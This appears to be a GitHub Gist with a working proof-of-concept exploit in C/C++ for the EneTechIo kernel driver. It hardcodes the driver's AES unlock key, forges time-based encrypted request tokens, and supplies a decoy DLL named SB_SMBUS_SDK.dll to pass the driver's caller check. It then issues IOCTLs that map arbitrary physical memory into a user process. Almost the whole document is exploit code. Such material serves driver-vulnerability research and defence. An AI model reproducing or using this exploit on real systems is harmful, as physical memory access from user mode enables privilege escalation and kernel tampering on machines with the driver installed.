Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
EneTech newest variant (May 2020) unlock, (app+dll)
#include <windows.h>
#include <cstdio>
#include "ntos.h"
#define WINIO_DEVICE_TYPE (DWORD)0x8010
#define WINIO_MAP_FUNCID (DWORD)0x810
#define WINIO_UNMAP_FUNCID (DWORD)0x811
#define IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY \
CTL_CODE(WINIO_DEVICE_TYPE, WINIO_MAP_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102040
#define IOCTL_WINIO_UNMAP_USER_PHYSICAL_MEMORY \
CTL_CODE(WINIO_DEVICE_TYPE, WINIO_UNMAP_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102044
#ifdef __cplusplus
extern "C" {
#include "aes.h" //TinyAES
}
#endif
typedef struct _WINIO_PHYSICAL_MEMORY_INFO_EX {
ULONG_PTR CommitSize;
ULONG_PTR BusAddress;
HANDLE SectionHandle;
PVOID BaseAddress;
PVOID ReferencedObject;
UCHAR EncryptedKey[16];
} WINIO_PHYSICAL_MEMORY_INFO_EX, * PWINIO_PHYSICAL_MEMORY_INFO_EX;
typedef struct _WINIO_READ_MSR_INPUT {
ULONG Msr;
UCHAR EncryptedKey[16];
} WINIO_READ_MSR_INPUT, * PWINIO_READ_MSR_INPUT;
typedef struct _WINIO_READ_MSR_OUTPUT {
ULONG MsrLow;
UCHAR SpareBytes[16];
ULONG MsrHigh;
} WINIO_READ_MSR_OUTPUT, * PWINIO_READ_MSR_OUTPUT;
ULONG g_UnlockKey[4] = { 0x9984FD3E, 0x70683A8, 0xBD444418, 0x5E10D83 };
ULONG GetTimeAsSecondsSince1970()
{
LARGE_INTEGER fileTime;
ULONG seconds = 0;
GetSystemTimePreciseAsFileTime((PFILETIME)&fileTime);
RtlTimeToSecondsSince1970(&fileTime, &seconds);
return seconds;
}
BOOL WinIoCallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_In_opt_ PVOID OutputBuffer,
_In_opt_ ULONG OutputBufferLength)
{
BOOL bResult = FALSE;
IO_STATUS_BLOCK ioStatus;
NTSTATUS ntStatus = NtDeviceIoControlFile(DeviceHandle,
NULL,
NULL,
NULL,
&ioStatus,
IoControlCode,
InputBuffer,
InputBufferLength,
OutputBuffer,
OutputBufferLength);
bResult = NT_SUCCESS(ntStatus);
SetLastError(RtlNtStatusToDosError(ntStatus));
return bResult;
}
PVOID WinIoMapMemory2(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_ ULONG NumberOfBytes,
_Out_ HANDLE* SectionHandle,
_Out_ PVOID* ReferencedObject)
{
AES_ctx ctx;
WINIO_PHYSICAL_MEMORY_INFO_EX request;
*SectionHandle = NULL;
*ReferencedObject = NULL;
RtlSecureZeroMemory(&ctx, sizeof(ctx));
AES_init_ctx(&ctx, (uint8_t*)&g_UnlockKey);
RtlSecureZeroMemory(&request, sizeof(request));
request.CommitSize = NumberOfBytes;
request.BusAddress = PhysicalAddress;
ULONG seconds = GetTimeAsSecondsSince1970();
RtlCopyMemory(&request.EncryptedKey, (PVOID)&seconds, sizeof(seconds));
AES_ECB_encrypt(&ctx, (UCHAR*)&request.EncryptedKey);
if (WinIoCallDriver(DeviceHandle,
IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY,
&request,
sizeof(request),
&request,
sizeof(request)))
{
*SectionHandle = request.SectionHandle;
*ReferencedObject = request.ReferencedObject;
return request.BaseAddress;
}
return NULL;
}
VOID WinIoUnmapMemory2(
_In_ HANDLE DeviceHandle,
_In_ PVOID SectionToUnmap,
_In_ HANDLE SectionHandle,
_In_ PVOID ReferencedObject
)
{
AES_ctx ctx;
WINIO_PHYSICAL_MEMORY_INFO_EX request;
RtlSecureZeroMemory(&ctx, sizeof(ctx));
AES_init_ctx(&ctx, (uint8_t*)&g_UnlockKey);
RtlSecureZeroMemory(&request, sizeof(request));
request.BaseAddress = SectionToUnmap;
request.ReferencedObject = ReferencedObject;
request.SectionHandle = SectionHandle;
ULONG seconds = GetTimeAsSecondsSince1970();
RtlCopyMemory(&request.EncryptedKey, (PVOID)&seconds, sizeof(ULONG));
AES_ECB_encrypt(&ctx, (UCHAR*)&request.EncryptedKey);
WinIoCallDriver(DeviceHandle,
IOCTL_WINIO_UNMAP_USER_PHYSICAL_MEMORY,
&request,
sizeof(request),
&request,
sizeof(request));
}
int main()
{
HMODULE hLib = LoadLibraryEx(L"SB_SMBUS_SDK.dll", NULL, 0);
if (hLib) {
HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\EneTechIo"),
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
if (deviceHandle == INVALID_HANDLE_VALUE) {
printf_s("[!] Unable to open device\r\n");
return -1;
}
else {
printf_s("[+] EneTechIo device opened\r\n");
}
HANDLE sectionHandle;
PVOID refObject;
PVOID mappedMemory;
ULONG_PTR mapAddress = 0x12000;
mappedMemory = WinIoMapMemory2(deviceHandle,
mapAddress,
1024 * 1024,
&sectionHandle,
&refObject);
if (mappedMemory) {
printf_s("[+] IOCTL %lx succeeded, physmem at %llx mapped\r\n",
IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY, mapAddress);
WinIoUnmapMemory2(deviceHandle,
mappedMemory,
sectionHandle,
refObject);
}
else {
printf_s("[!] Could not map physical memory\r\n");
}
CloseHandle(deviceHandle);
}
return 0;
}
//
// SB_SMBUS_SDK.dll
//
//
// Warning, dll name is always SB_SMBUS_SDK.dll CASE SENSITIVE due to driver side check.
//
#if defined(_MSC_VER)
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
#pragma comment(lib, "vcruntimed.lib")
#pragma comment(lib, "ucrtd.lib")
#else
#pragma comment(lib, "libucrt.lib")
#pragma comment(lib, "libvcruntime.lib")
#endif
#endif
#endif
#include <Windows.h>
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved)
{
if (fdwReason == DLL_PROCESS_ATTACH)
DisableThreadLibraryCalls(hinstDLL);
return TRUE;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment